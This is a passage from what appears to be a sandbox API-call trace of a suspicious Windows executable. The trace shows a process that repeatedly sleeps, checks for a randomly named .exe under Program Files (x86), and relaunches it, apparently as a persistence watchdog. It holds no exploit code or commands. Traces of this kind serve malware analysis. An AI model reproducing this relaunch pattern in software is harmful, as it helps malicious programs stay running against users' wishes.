lpProcessInformation=0x122bfe80*(hProcess=0x11d8, hThread=0x127c, dwProcessId=0x864, dwThreadId=0xe8), hNewToken=0x0) returned 1 [0201.283] Sleep (dwMilliseconds=0x1388) [0201.284] Sleep (dwMilliseconds=0x1388) [0201.297] Sleep (dwMilliseconds=0x1388) [0201.299] Sleep (dwMilliseconds=0x1388) [0201.301] Sleep (dwMilliseconds=0x1388) [0201.303] Sleep (dwMilliseconds=0x1388) [0201.305] Sleep (dwMilliseconds=0x1388) [0201.306] Sleep (dwMilliseconds=0x1388) [0201.307] Sleep (dwMilliseconds=0x1388) [0201.309] Sleep (dwMilliseconds=0x1388) [0201.310] Sleep (dwMilliseconds=0x1388) [0201.315] Sleep (dwMilliseconds=0x1388) [0201.316] Sleep (dwMilliseconds=0x1388) [0201.317] Sleep (dwMilliseconds=0x1388) [0201.319] Sleep (dwMilliseconds=0x1388) [0201.322] Sleep (dwMilliseconds=0x1388) [0201.324] Sleep (dwMilliseconds=0x1388) [0201.325] Sleep (dwMilliseconds=0x1388) [0201.330] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.330] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x12a0, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.330] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.330] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65c80) returned 1 [0201.330] NtQueryInformationFile (in: FileHandle=0x12a0, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0201.331] NtClose (Handle=0x12a0) returned 0x0 [0201.331] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.331] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x12a0, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.331] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.331] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64f00) returned 1 [0201.331] NtClose (Handle=0x12a0) returned 0x0 [0201.334] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1290, hThread=0x12a0, dwProcessId=0xe48, dwThreadId=0x1308), hNewToken=0x0) returned 1 [0201.352] Sleep (dwMilliseconds=0x1388) [0201.353] Sleep (dwMilliseconds=0x1388) [0201.354] Sleep (dwMilliseconds=0x1388) [0201.356] Sleep (dwMilliseconds=0x1388) [0201.357] Sleep (dwMilliseconds=0x1388) [0201.359] Sleep (dwMilliseconds=0x1388) [0201.362] Sleep (dwMilliseconds=0x1388) [0201.367] Sleep (dwMilliseconds=0x1388) [0201.368] Sleep (dwMilliseconds=0x1388) [0201.369] Sleep (dwMilliseconds=0x1388) [0201.371] Sleep (dwMilliseconds=0x1388) [0201.372] Sleep (dwMilliseconds=0x1388) [0201.374] Sleep (dwMilliseconds=0x1388) [0201.377] Sleep (dwMilliseconds=0x1388) [0201.378] Sleep (dwMilliseconds=0x1388) [0201.382] Sleep (dwMilliseconds=0x1388) [0201.385] Sleep (dwMilliseconds=0x1388) [0201.386] Sleep (dwMilliseconds=0x1388) [0201.388] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.388] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x12a4, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.388] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.388] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64380) returned 1 [0201.388] NtQueryInformationFile (in: FileHandle=0x12a4, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0201.388] NtClose (Handle=0x12a4) returned 0x0 [0201.389] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.389] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x12a4, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.389] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.389] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65080) returned 1 [0201.389] NtClose (Handle=0x12a4) returned 0x0 [0201.391] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x129c, hThread=0x12a4, dwProcessId=0x8a8, dwThreadId=0x1324), hNewToken=0x0) returned 1 [0201.408] Sleep (dwMilliseconds=0x1388) [0201.410] Sleep (dwMilliseconds=0x1388) [0201.414] Sleep (dwMilliseconds=0x1388) [0201.415] Sleep (dwMilliseconds=0x1388) [0201.416] Sleep (dwMilliseconds=0x1388) [0201.418] Sleep (dwMilliseconds=0x1388) [0201.420] Sleep (dwMilliseconds=0x1388) [0201.421] Sleep (dwMilliseconds=0x1388) [0201.422] Sleep (dwMilliseconds=0x1388) [0201.424] Sleep (dwMilliseconds=0x1388) [0201.426] Sleep (dwMilliseconds=0x1388) [0201.431] Sleep (dwMilliseconds=0x1388) [0201.433] Sleep (dwMilliseconds=0x1388) [0201.435] Sleep (dwMilliseconds=0x1388) [0201.436] Sleep (dwMilliseconds=0x1388) [0201.438] Sleep (dwMilliseconds=0x1388) [0201.439] Sleep (dwMilliseconds=0x1388) [0201.441] Sleep (dwMilliseconds=0x1388) [0201.442] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.442] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1bcc, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.445] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.445] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64580) returned 1 [0201.445] NtQueryInformationFile (in: FileHandle=0x1bcc, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0201.445] NtClose (Handle=0x1bcc) returned 0x0 [0201.446] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.446] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1bcc, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.446] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.446] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64f00) returned 1 [0201.446] NtClose (Handle=0x1bcc) returned 0x0 [0201.448] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x145c, hThread=0x1bcc, dwProcessId=0x1c4, dwThreadId=0x340), hNewToken=0x0) returned 1 [0201.464] Sleep (dwMilliseconds=0x1388) [0201.466] Sleep (dwMilliseconds=0x1388) [0201.467] Sleep (dwMilliseconds=0x1388) [0201.468] Sleep (dwMilliseconds=0x1388) [0201.470] Sleep (dwMilliseconds=0x1388) [0201.471] Sleep (dwMilliseconds=0x1388) [0201.472] Sleep (dwMilliseconds=0x1388) [0201.474] Sleep (dwMilliseconds=0x1388) [0201.478] Sleep (dwMilliseconds=0x1388) [0201.479] Sleep (dwMilliseconds=0x1388) [0201.482] Sleep (dwMilliseconds=0x1388) [0201.483] Sleep (dwMilliseconds=0x1388) [0201.485] Sleep (dwMilliseconds=0x1388) [0201.487] Sleep (dwMilliseconds=0x1388) [0201.488] Sleep (dwMilliseconds=0x1388) [0201.490] Sleep (dwMilliseconds=0x1388) [0201.494] Sleep (dwMilliseconds=0x1388) [0201.495] Sleep (dwMilliseconds=0x1388) [0201.497] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.497] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1294, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.497] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.497] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64480) returned 1 [0201.497] NtQueryInformationFile (in: FileHandle=0x1294, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0201.498] NtClose (Handle=0x1294) returned 0x0 [0201.498] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.498] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1294, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.498] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.498] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64580) returned 1 [0201.498] NtClose (Handle=0x1294) returned 0x0 [0201.501] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1298, hThread=0x1294, dwProcessId=0xe64, dwThreadId=0x638), hNewToken=0x0) returned 1 [0201.517] Sleep (dwMilliseconds=0x1388) [0201.519] Sleep (dwMilliseconds=0x1388) [0201.521] Sleep (dwMilliseconds=0x1388) [0201.522] Sleep (dwMilliseconds=0x1388) [0201.524] Sleep (dwMilliseconds=0x1388) [0201.525] Sleep (dwMilliseconds=0x1388) [0201.526] Sleep (dwMilliseconds=0x1388) [0201.528] Sleep (dwMilliseconds=0x1388) [0201.532] Sleep (dwMilliseconds=0x1388) [0201.533] Sleep (dwMilliseconds=0x1388) [0201.535] Sleep (dwMilliseconds=0x1388) [0201.538] Sleep (dwMilliseconds=0x1388) [0201.540] Sleep (dwMilliseconds=0x1388) [0201.541] Sleep (dwMilliseconds=0x1388) [0201.543] Sleep (dwMilliseconds=0x1388) [0201.548] Sleep (dwMilliseconds=0x1388) [0201.549] Sleep (dwMilliseconds=0x1388) [0201.550] Sleep (dwMilliseconds=0x1388) [0201.552] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.552] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x5e4, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.552] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.552] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64880) returned 1 [0201.552] NtQueryInformationFile (in: FileHandle=0x5e4, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0201.553] NtClose (Handle=0x5e4) returned 0x0 [0201.553] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.553] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x5e4, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.553] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.553] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64f00) returned 1 [0201.553] NtClose (Handle=0x5e4) returned 0x0 [0201.555] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x5e0, hThread=0x5e4, dwProcessId=0xe6c, dwThreadId=0x1310), hNewToken=0x0) returned 1 [0201.573] Sleep (dwMilliseconds=0x1388) [0201.575] Sleep (dwMilliseconds=0x1388) [0201.577] Sleep (dwMilliseconds=0x1388) [0201.579] Sleep (dwMilliseconds=0x1388) [0201.581] Sleep (dwMilliseconds=0x1388) [0201.582] Sleep (dwMilliseconds=0x1388) [0201.583] Sleep (dwMilliseconds=0x1388) [0201.585] Sleep (dwMilliseconds=0x1388) [0201.587] Sleep (dwMilliseconds=0x1388) [0201.589] Sleep (dwMilliseconds=0x1388) [0201.590] Sleep (dwMilliseconds=0x1388) [0201.591] Sleep (dwMilliseconds=0x1388) [0201.597] Sleep (dwMilliseconds=0x1388) [0201.598] Sleep (dwMilliseconds=0x1388) [0201.600] Sleep (dwMilliseconds=0x1388) [0201.602] Sleep (dwMilliseconds=0x1388) [0201.603] Sleep (dwMilliseconds=0x1388) [0201.604] Sleep (dwMilliseconds=0x1388) [0201.606] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.606] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0xdf0, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.606] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.606] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65200) returned 1 [0201.606] NtQueryInformationFile (in: FileHandle=0xdf0, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0201.607] NtClose (Handle=0xdf0) returned 0x0 [0201.607] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.607] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0xdf0, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.607] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.607] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65500) returned 1 [0201.607] NtClose (Handle=0xdf0) returned 0x0 [0201.613] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x628, hThread=0xdf0, dwProcessId=0xddc, dwThreadId=0xa08), hNewToken=0x0) returned 1 [0201.630] Sleep (dwMilliseconds=0x1388) [0201.631] Sleep (dwMilliseconds=0x1388) [0201.633] Sleep (dwMilliseconds=0x1388) [0201.634] Sleep (dwMilliseconds=0x1388) [0201.636] Sleep (dwMilliseconds=0x1388) [0201.637] Sleep (dwMilliseconds=0x1388) [0201.639] Sleep (dwMilliseconds=0x1388) [0201.643] Sleep (dwMilliseconds=0x1388) [0201.645] Sleep (dwMilliseconds=0x1388) [0201.646] Sleep (dwMilliseconds=0x1388) [0201.648] Sleep (dwMilliseconds=0x1388) [0201.649] Sleep (dwMilliseconds=0x1388) [0201.651] Sleep (dwMilliseconds=0x1388) [0201.652] Sleep (dwMilliseconds=0x1388) [0201.654] Sleep (dwMilliseconds=0x1388) [0201.655] Sleep (dwMilliseconds=0x1388) [0201.661] Sleep 